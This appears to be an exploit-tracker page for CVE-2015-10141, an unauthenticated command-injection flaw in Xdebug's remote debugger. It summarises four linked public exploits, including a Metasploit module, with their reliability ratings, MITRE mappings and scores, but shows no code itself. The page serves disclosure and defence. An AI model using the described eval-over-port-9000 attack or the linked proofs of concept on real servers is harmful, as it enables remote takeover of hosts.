CVE-2015-10141

CRITICAL NUCLEI

Xdebug < 2.5.5 - Unauthenticated OS Command Injection via Remote Debugger Interface

Title source: llm

Exploitation Summary

EIP tracks 4 public exploits for CVE-2015-10141. PoCs published by Metasploit, D3Ext, n0m4d22, including Metasploit module exploits/unix/http/xdebug_unauth_exec. A Nuclei detection template is also available.

AI-analyzed exploit summary This Metasploit module exploits a vulnerability in Xdebug versions 2.5.5 and below, allowing unauthenticated OS command execution via the eval command. It establishes a reverse shell by leveraging the Xdebug debugger session.

Description

An unauthenticated OS command injection vulnerability exists within Xdebug versions 2.5.5 and earlier, a PHP debugging extension developed by Derick Rethans. When remote debugging is enabled, Xdebug listens on port 9000 and accepts debugger protocol commands without authentication. An attacker can send a crafted eval command over this interface to execute arbitrary PHP code, which may invoke system-level functions such as system() or passthru(). This results in full compromise of the host under the privileges of the web server user.

Exploits (4)

exploitdb WORKING POC VERIFIED

by Metasploit · rubyremotephp

https://www.exploit-db.com/exploits/44568

View Code ZIP pw:eip

This Metasploit module exploits a vulnerability in Xdebug versions 2.5.5 and below, allowing unauthenticated OS command execution via the eval command. It establishes a reverse shell by leveraging the Xdebug debugger session.

Classification

Working Poc 95%

Attack Type

Rce

Complexity

Moderate

Reliability

Reliable

Target: Xdebug versions 2.5.5 and below

No auth needed

Prerequisites: Xdebug enabled on the target server · Network access to the target · Writeable directory on the target

MITRE ATT&CK

T1190 - Exploit Public-Facing Application T1059 - Command and Scripting Interpreter

devstral-2 · analyzed Feb 16, 2026 Full analysis →

nomisec WORKING POC 30 stars

by D3Ext · poc

https://github.com/D3Ext/CVE-2015-10141

View Code ZIP pw:eip

This is a functional exploit for CVE-2015-10141, targeting Xdebug v2.5.5 and earlier. It leverages unauthenticated command execution via the Xdebug debugger interface on port 9000, allowing arbitrary PHP code execution.

Classification

Working Poc 95%

Attack Type

Rce

Complexity

Moderate

Reliability

Reliable

Target: Xdebug v2.5.5 and earlier

No auth needed

Prerequisites: Xdebug remote debugging enabled · Target PHP application accessible · Network access to port 9000 on the target

MITRE ATT&CK

T1190 - Exploit Public-Facing Application T1203 - Exploitation for Client Execution

devstral-2 · analyzed Feb 16, 2026 Full analysis →

nomisec WORKING POC

by n0m4d22 · poc

https://github.com/n0m4d22/PoC-CVE-2015-10141-Xdebug

View Code ZIP pw:eip

This is a functional Python exploit for CVE-2015-10141, targeting Xdebug ≤ 2.5.5. It leverages the unauthenticated debugging protocol on port 9000 to achieve remote command execution via base64-encoded PHP system() calls.

Classification

Working Poc 95%

Attack Type

Rce

Complexity

Moderate

Reliability

Reliable

Target: Xdebug ≤ 2.5.5

No auth needed

Prerequisites: Target with Xdebug ≤ 2.5.5 exposed on port 9000 · Network access to the target

MITRE ATT&CK

T1189 - Drive-by Compromise T1059 - Command and Scripting Interpreter

devstral-2 · analyzed Feb 16, 2026 Full analysis →

metasploit WORKING POC EXCELLENT

by Ricter Zheng, Shaksham Jaiswal, Mumbai · rubypocphp

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/http/xdebug_unauth_exec.rb

View Code ZIP pw:eip

This Metasploit module exploits a vulnerability in Xdebug versions 2.5.5 and below, allowing unauthenticated remote command execution via the eval command. It sets up a TCP server to deliver a base64-encoded PHP payload to the target.

Classification

Working Poc 95%

Attack Type

Rce

Complexity

Moderate

Reliability

Reliable

Target: Xdebug versions 2.5.5 and below

No auth needed

Prerequisites: Xdebug enabled on the target server · Network access to the target

MITRE ATT&CK

T1190 - Exploit Public-Facing Application T1059 - Command and Scripting Interpreter

devstral-2 · analyzed Feb 16, 2026 Full analysis →

Nuclei Templates (1)

Xdebug <= 2.5.5 - Command Injection

CRITICALVERIFIEDby pwnhxl

References (6)

Core 6

Core References

Various Sources product

https://xdebug.org/

Various Sources technical-description

https://kirtixs.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/

Various Sources technical-description

http://web.archive.org/web/20231226215418/https://paper.seebug.org/397/

Exploit, Third Party Advisory exploit

https://www.exploit-db.com/exploits/44568

Vendor Advisory third-party-advisory

https://www.fortiguard.com/encyclopedia/ips/46000

Third Party Advisory third-party-advisory

https://www.vulncheck.com/advisories/xdebug-remote-debugger-unauth-os-command-execution

Scores

CVSS v4 9.3

EPSS 0.6571

EPSS Percentile 98.5%

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CISA SSVC

Vulnrichment

Exploitation poc

Automatable yes

Technical Impact total

Details

CWE

CWE-306 CWE-78

Status published

Products (1)

Xdebug/Xdebug < 2.5.5

Published Jul 23, 2025

Tracked Since Feb 18, 2026